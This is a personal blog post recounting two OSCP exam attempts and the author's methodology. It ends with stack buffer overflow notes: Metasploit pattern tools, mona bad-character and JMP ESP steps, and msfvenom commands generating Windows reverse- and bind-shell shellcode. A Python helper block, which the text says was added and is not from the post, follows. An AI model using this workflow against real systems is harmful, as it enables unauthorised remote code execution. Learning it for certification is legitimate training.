Will
9 min read · Oct 24, 2020


OSCP – how to pass first time, like I didn’t.

Part 1: So it was a cold, dark and rainy November morning in Surrey, back in 2018. It was my second year of studying an MSc in Information Security at Royal Holloway, University of London. I had decided that if I was going to pursue a career as a pentester, I needed some qualifications. I did my research, and these are my opinions as a U.K. citizen not yet working in the industry.

I needed a qualification which would show I had practical hacking skills. I felt anyone can study content, take an exam and get a degree or MSc if they are determined. I was already pursuing this whilst having a full-time job (outside the industry), being a parent, and running a web development business in Cobham, Surrey as a freelance web developer, registered as a sole trader. This was a lot, but I needed to prove my worth. So after doing some research I decided upon a few qualifications:

  • CEH
  • CREST
  • OSCP

From looking at job postings, it was clear that CREST and OSCP were favoured and held more weight. Now, what I liked about OSCP was that it was entirely practical. It looked like a really well developed course that would get me hacking. So I enrolled.

I worked through the course material, watching the videos and completing the exercises in the PDF in any spare moment I got, like a good student. However, after several months, I was prioritising this rather than the MSc, which had set me back a fair bit of cash. I did not want to waste the MSc, and I had not even entered the OSCP labs. I made the decision to put the OSCP on hold until I had more time. I had already learned a lot and been introduced to a variety of tools. However, this was just the beginning.

Covid, Opportunities and HackTheBox (HTB)

Part 2: Enter Covid-19. Now, as soon as this whole pandemic kicked off, I knew I needed to use this time wisely, especially as I was going to be having time off work over the Summer as well. As I was going to be completing my MSc the following year and then looking for jobs, I saw this as the perfect time to finish my exams for my MSc and then to spend every waking hour in the OSCP labs.

I booked my exam for July as well as purchasing 30 days of intense lab time. The labs weren’t to start for 2 weeks, so I started practising over at HackTheBox.eu. The first couple of machines there were my first ever, and boy, what a rush it was when I got those root shells. And you know what, that rush and feeling of sheer accomplishment never goes, EVER!

OSCP Labs

This is not an exaggeration. I spent every waking moment in the OSCP labs. I would get up extra early for work to try and complete a machine before work. During work, I would take every opportunity to be working on it, running an nmap scan in the background whilst working on something, my mind constantly working on puzzles and thinking of attack paths — multitasking at its finest. I would then get home from work, and work in the labs. Now I was torn at points, as I wanted to spend time with my daughters, but knew I needed this qualification to get an edge when applying for jobs. I would work in the labs until it was time to turn in for the day. I did this on repeat for the entirety of my lab time, until my lab time was up. I extended it by another 30 days as I had made so much progress. At the beginning of this journey it took me perhaps 2 to 3 days to “p0wn” a box. By the end of the 60 days I was doing perhaps 2 a day.

Exam time — Take 1

To be honest, the entire 24 hour exam thing whilst being proctored scared me senseless. I did not know what to expect. I had bought a laptop specifically for hacking, as well as an ethernet cable, as I wanted a dedicated and reliable Internet connection. My biggest fear was that I would be doing well in the exam and my connection would cut out, and then I would fail as they had lost sight of me. Now, the proctors were very supportive. I began the exam at 7PM. I was fully aware of the time and had an idea that I would work until exhaustion and then maybe sleep a tiny amount, or perhaps I would just work through the night and hope for the best. I made good progress initially and felt I might just be able to do it!! However, as time went by, and scans such as nikto ran slowly or were ineffective (I did not use it in the second attempt at all, relying on gobuster or wfuzz instead), pressure mounted, as did my stress, as did my tiredness, and then, undoubtedly, so did my hopes of passing fade. I did not want to sleep or leave the machine for fear of any accusations of malpractice. So I perhaps went to the toilet once, and slept with the camera on me, with the lights on etc. Now this was silly and my own doing. I ended up working until 6:30PM the following day, before throwing the towel in, beaten and battered by my lack of methodology and experience. Sad times, very sad times.

Exam Time — Take 2

I bought more lab time, practised, practised, and practised. I had managed to get root access on a minimum of 40 Public network machines in the OSCP labs. A friend of mine from Royal Holloway had suggested Tib3rius. Now this dude totally saved me on Buffer Overflows. This made all the difference, instead of failing the buffer overflow like I did on the first attempt. He really explained and broke things down. I initially looked at https://tryhackme.com/room/bufferoverflowprep, but what really helped me was his YouTube video:

I literally watched this video no fewer than 10 times, I kid you not. On the day of my exam, I watched it over 3 times, ensuring my notes were 100% correct. Sure enough, I had got the proof.txt for the buffer overflow in under an hour during the exam. I hated it when I heard people say that it’s an “easy” 25 pointer. I sometimes feel that when people write up their OSCP exam experiences, they try and make themselves sound a bit better than they are, so they sound oh so “Hack3rM4N God LVL lulz”. But to be honest, it is highly technical, and you need a really good understanding of registers and Assembly in my opinion. This cannot be blagged; you have to know your stuff. That is why, as an auditory and visual learner, I really dug Tib3rius’ clear instructions. Furthermore, this was the majority of my examination report, with many, many screenshots. This reduced my stress, and I then looked at the other machines and points I needed to secure a pass.

I then went for big pointers as I knew I needed to reduce stress. I also knew I had plenty of time, and just needed to follow a strong methodology. Now, I won’t be going into specifics here. But with most machines in the labs and on HackTheBox I found a pattern:

Port scan — this is the key. They tell a story. I kid you not.

For example, if you see ports 80 and 22 open, that means you know it’s a web server, and you’ll have to brute force directories, or do some sort of SQLi, or look for a weak web application with a vulnerability to find credentials. These credentials, or a variant of them, can then be used to SSH in. Then from there you may have to escalate privileges. Use winpeas or linpeas (depending on OS) or an alternative to determine further information such as hashes, stored passwords, services running as root etc. It literally is a jigsaw puzzle. And by gathering information from everywhere you can, it is like gaining more jigsaw pieces. Now sometimes, you may be able to complete the puzzle and see what it is without having all the pieces, or sometimes you may need a few more pieces. Either way, this time I was far more successful, probably dropping only around 10 points — ending with 90/100.

What was different this time round?

My preparation. I literally came up with a time plan with targets for the entire exam. This gave me structure and kept me from losing my mind. I also had experience from the previous exam, so my stress levels were lower. I had a lot riding on this exam; otherwise I might find it hard to procure a job. Furthermore, I had sacrificed precious time with my 2 daughters, time I will never get back, and I was not going to go down without a fight this round. I learned from my mistakes, learned not to use nikto lol, and had far, far more experience.

I also made extremely clear and concise notes for the buffer overflow, which I will be including below. I also have a sheet of my go to commands from hackthebox and the OSCP labs.

Without further ado, here are my notes, and you can see I carefully planned how I would perform my attack. This is what you should do for all eventualities. You should think of things that can go wrong, and how you may sidestep and still manage to perform an attack. In my first attempt, I would be blindsided if something did not work. In my second, I would adapt. You have to be fluid and creative. Think of another way around. All machines are vulnerable, there is a way. All you need to do is not give up and “TRY HARDER”. It literally is it. Do not give up.

Here are the notes I used from Tib3rius. So to my friend who suggested Tib3rius, and to Tib3rius, thank you. You started my exam off on the right foot and helped me considerably:

A nice tutorial on Buffer Overflows: have up during exam for reference:

Tib3rius: https://youtu.be/1X2JGF_9JGM — refer to in exam if get stuck or worried.

https://github.com/gh0x0st/Buffer_Overflow

Create pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l number
Put pattern into exploit (change the junk variable), send to input/program
Look for EIP getting overwritten.
Make note of the characters.

Find offset:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q EIPValue
This gives us the offset to use as part of the buffer/junk.

Find Badchars:
Update Python code
Restart app, play, and run exploit.py
Look for: Access violation when executing 42424242 — which are 4 B’s.
Badchars would be loaded into ESP register.
Right click on ESP register, and click ‘follow in dump’
!mona bytearray -b “\x00”
Will output a .bin file.

Then want to compare everything in ESP with the output, so will use mona compare.
!mona compare -f C:\pathtothebinfile.bin -a address
The address is the value that is currently in the ESP register on the top right of the screen.
Press return.
This gives us our bad chars on first round.
However, if you have 2 consecutive bytes, e.g. \x07\x08, remove the first from our bad chars string, and regenerate the .bin file with !mona bytearray -b "\x00\x07" for example
Relaunch the app
Modify exploit code (bad chars without the x07)
Recrash the application by sending the python exploit: python exploit.py

Now rerun compare command, however, ESP address may have changed.
!mona compare -f C:\pathtothebinfile.bin -a address
Press return, and check bad chars.
Right click on ESP and follow dump to check the bad chars that are there.

Keep repeating the above process, until you get ‘unmodified’.

Finding JMP Point:
!mona jmp -r esp -cpb "\x00...badchars"
Should get another window.
Window — log data
Find an address at the bottom that has JMP. Get the address.
Have to write the address backwards in 2s (one byte at a time, i.e. little-endian order).
e.g. address on far left: 625011af
\xaf\x11\x50\x62
This will be used instead of the B’s.
Right click on the address in the log window we have, and add breakpoint.

Update payload with msfvenom:
Ensure IP is of target machine, and not of the Windows test machine which we have been using.
msfvenom -p windows/shell_reverse_tcp LHOST=ip.ip.ip.ip LPORT=53 EXITFUNC=thread -b "\x00...badchars" -f c
OR:
msfvenom -p windows/shell_bind_tcp EXITFUNC=thread LPORT=80 -f c -a x86 --platform windows -b "\x00...badchars"
Copy everything from the first quote to the end quote (not the semicolon at the end) with the generated shellcode.
Check x86/shikata_ga_nai encoder has been used in the output, as will need to use nops later on
Add to python exploit in payload variable.

Add NOPs padding:
Can use 16 or 64.
As the x86/shikata_ga_nai encoder was used (its decoder stub uses up some memory around ESP), we need to add some NOPs in front of the payload, as we don’t want it to overwrite registers or the start of the shellcode.

Potential issues:
If can’t copy strings between rdesktop and my kali system (as needed by msfvenom), can develop Python exploit on kali system instead and point it to the windows test machine.
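The pattern, offset, little-endian and bad-character steps from the notes above, reimplemented in Python as an added example (this is not code from the post or from Tib3rius’ material; the Metasploit and mona tools it mirrors are only approximated, and the dump in the demo is constructed):

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Cyclic pattern in the Metasploit style (Aa0Aa1...Aa9Ab0...). Every
    3-byte triple is unique, so any 4 bytes locate a position (max 20280)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern is only unique up to 20280 bytes")


def pattern_offset(eip_hex: str, length: int = 20280) -> int:
    """Offset of the bytes that landed in EIP. The debugger shows EIP as a
    number (e.g. 41316141); in memory those bytes sit little-endian, so the
    needle is the reversed byte string (b'Aa1A')."""
    needle = struct.pack("<I", int(eip_hex, 16))
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern")
    return idx


def little_endian(address: int) -> bytes:
    """The 'write the address backwards in 2s' step: 0x625011af -> af 11 50 62."""
    return struct.pack("<I", address)


def bytearray_without(badchars: bytes) -> bytes:
    """Same idea as !mona bytearray -b: every byte value except the excluded ones."""
    return bytes(b for b in range(256) if b not in badchars)


def badchar_round(badchars: bytes, dump: bytes) -> list[int]:
    """One round of the compare loop. `dump` is what is read back at ESP after
    sending bytearray_without(badchars). Of consecutive flagged bytes (e.g.
    07 08) only the first is kept, since the second is usually collateral
    damage from the first being mangled or truncating the string; re-test after
    excluding it. An empty result is the 'unmodified' state from the notes."""
    expected = bytearray_without(badchars)
    mangled = [e for i, e in enumerate(expected) if i >= len(dump) or dump[i] != e]
    return [b for i, b in enumerate(mangled) if i == 0 or b != mangled[i - 1] + 1]


if __name__ == "__main__":
    # Constructed dump: a pretend target that zeroes 0x07, 0x08, 0x0a and 0x0d.
    sent = bytearray_without(b"\x00")
    seen = bytes(0 if b in (0x07, 0x08, 0x0a, 0x0d) else b for b in sent)
    print(pattern_offset("41316141"), little_endian(0x625011af).hex())
    print([hex(b) for b in badchar_round(b"\x00", seen)])  # ['0x7', '0xa', '0xd']
```

A second round with b"\x00\x07\x0a\x0d" excluded and an unmodified dump returns an empty list, which is the point at which the notes say to stop.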

This is just the beginning

First and foremost, thank you Offensive Security for putting together such a thorough, enjoyable and literally life-changing course and qualification. What a journey it has been, but I have just dipped my toes into the world of Penetration Testing, but boy does that water feel good on my toes! lol. I completed OSCP September 2020.

London, U.K. based Penetration Tester (OSCP & MSc in Info Sec from Royal Holloway, UoL) sharing his journey, fun and challenges with hacking.